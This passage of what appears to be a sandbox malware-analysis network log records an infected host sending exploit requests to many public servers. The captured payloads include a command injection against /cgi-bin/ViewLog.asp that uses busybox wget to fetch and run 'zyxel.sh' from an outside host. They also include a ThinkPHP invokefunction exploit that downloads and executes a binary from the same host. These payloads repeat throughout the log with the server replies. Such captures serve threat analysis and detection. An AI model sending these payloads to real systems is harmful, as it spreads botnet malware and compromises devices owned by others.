6f 74 3b 3e 42 3c 2f 73 70 61 6e 3e 61 63 6b 20 74 6f 20 4d 61 69 6e 2d 50 61 67 65 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"><title>Zieher1781AW - Error - 404</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="/css/login.css"> </head><body ><div class="header"><a href="http://www.lancom-systems.de"><img class="headerimg" src="/images/productsvg.svg" alt="LANCOM Systems Homepage"></a><p class="headerp">LANCOM 1781AW</p></div><div class="logincontent dullError"><h2>404 Not Found</h2><p>You asked for a URL not available on this server</p><form method="POST" action="/" ><div><button type="button" class="mainPageLink" accesskey="b" onclick="document.location.href='/'"><span style="text-decoration:underline">B</span>ack to Main-Page</button></div></form> </div> </body></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.15	37736	94.122.6.182	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.614855051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.15	45018	94.123.24.190	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.616530895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.15	49164	95.177.164.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.666150093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.073915005 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.705905914 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:42.937833071 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:49.593626976 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.649311066 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.016593933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.15	38516	112.171.185.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.795583963 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:37.081398964 CET	499	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:36 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 6d 6d 61 6c 6c 2e 6b 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at www.hmmall.kr Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.15	47362	88.10.162.12	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.317133904 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.15	32972	95.211.247.164	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.517011881 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:38.720638990 CET	534	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 340 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 56 4d 2d 34 62 65 65 34 66 33 66 2d 31 66 62 64 2d 34 63 33 37 2d 62 64 66 38 2d 65 34 30 34 33 39 62 39 38 64 61 35 2e 63 73 31 6c 6f 63 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at VM-4bee4f3f-1fbd-4c37-bdf8-e40439b98da5.cs1local Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.15	36812	95.141.36.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.534024954 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:38.752450943 CET	479	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:30:39 GMT Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.15	57376	95.217.133.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.541945934 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:38.770459890 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 07:22:15 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.15	46680	95.217.87.47	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.542182922 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:38.770469904 CET	450	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:38 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.33 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.15	39022	95.59.50.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:38.813056946 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:39.110260010 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:39.110761881 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.15	60296	94.26.41.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.193672895 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.369884968 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.15	42440	31.200.99.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.207459927 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.15	59982	95.86.125.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.215545893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.15	55130	95.86.125.89	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.363152981 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.15	45162	95.59.121.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.401154041 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:40.691726923 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:40.691854954 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.15	35460	95.183.101.160	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.453519106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
